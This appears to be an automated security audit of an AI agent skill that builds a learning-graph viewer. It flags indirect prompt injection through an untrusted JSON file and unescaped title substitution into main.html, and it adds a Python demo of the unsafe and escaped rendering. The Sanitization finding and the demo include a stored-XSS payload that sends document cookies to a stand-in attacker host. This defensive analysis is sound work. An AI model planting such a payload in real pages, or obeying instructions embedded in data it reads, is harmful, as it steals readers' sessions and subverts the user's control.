install-learning-graph-viewer

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Tags: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION
Full Analysis
  • [Indirect Prompt Injection] (HIGH): The skill reads untrusted data from a file and uses it to modify files on disk.
  • Ingestion points: The skill reads metadata from /docs/learning-graph/learning-graph.json.
  • Boundary markers: None. The JSON content reaches the agent without delimiters and without any instruction to treat text embedded in it as data rather than as commands.
  • Capability inventory: The skill uses mkdir to create directories, cp to copy asset files, and python3 to execute logic. Most critically, it rewrites main.html by replacing placeholders with values extracted from the JSON.
  • Sanitization: Absent. The instructions tell the agent to replace the TITLE placeholder in main.html with the raw value taken from the JSON file, with no HTML escaping. A title such as <script>fetch('https://attacker.com?c='+document.cookie)</script> would be written into the generated page unescaped and persist there as stored XSS, executing for every reader of the textbook's documentation.
  • [Command Execution] (LOW): The skill runs python3 -c with a hardcoded Python snippet to parse the JSON. The snippet itself is benign, but it establishes that the skill executes code on the host to process local files; any edit to that snippet or to the file it reads inherits the same privileges.
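The substitution step behind the Sanitization finding, shown as an added example rather than the skill's own code: a constructed learning-graph.json with a script payload in its title, the raw-replace behaviour the audit describes, the escaped alternative, and a post-render check that flags a live script tag in the output. The JSON key path (metadata.title) and the template text are assumptions, since the audit only states that metadata is read from the file.

```python
import html
import json
import re

# Constructed sample inputs (not taken from the audited skill).
# The key path metadata.title is an assumption; the audit does not name it.
SAMPLE_JSON = json.dumps({
    "metadata": {
        "title": "Intro Course<script>fetch('https://attacker.com?c='+document.cookie)</script>"
    }
})
SAMPLE_TEMPLATE = (
    "<html><head><title>TITLE</title></head>"
    "<body><h1>TITLE</h1></body></html>"
)

SCRIPT_OPEN = re.compile(r"<\s*script\b", re.IGNORECASE)


def extract_title(raw_json: str) -> str:
    """Pull the title out of the learning-graph JSON (assumed key path)."""
    data = json.loads(raw_json)
    return str(data["metadata"]["title"])


def render_unsafe(template: str, title: str) -> str:
    """Mirror the audited behaviour: raw value substituted for the placeholder."""
    return template.replace("TITLE", title)


def render_safe(template: str, title: str) -> str:
    """Hardened form: escape <, >, &, and quotes before substitution.

    html.escape is correct for element content and quoted attribute values;
    a value destined for a <script> block or a URL needs context-specific
    encoding instead.
    """
    return template.replace("TITLE", html.escape(title, quote=True))


def contains_live_script(rendered_html: str) -> bool:
    """Post-render check: true if an unescaped <script ...> opening tag survived."""
    return bool(SCRIPT_OPEN.search(rendered_html))


if __name__ == "__main__":
    title = extract_title(SAMPLE_JSON)
    print("unsafe render has live script:", contains_live_script(render_unsafe(SAMPLE_TEMPLATE, title)))
    print("safe render has live script:  ", contains_live_script(render_safe(SAMPLE_TEMPLATE, title)))
    print(render_safe(SAMPLE_TEMPLATE, title))
```

The check in contains_live_script is a coarse regression guard for a build pipeline, not a substitute for escaping: it catches the exact class of payload the audit cites but not event-handler attributes or javascript: URLs, which the escaping in render_safe neutralizes in element-content and attribute contexts.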
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 16, 2026, 01:06 PM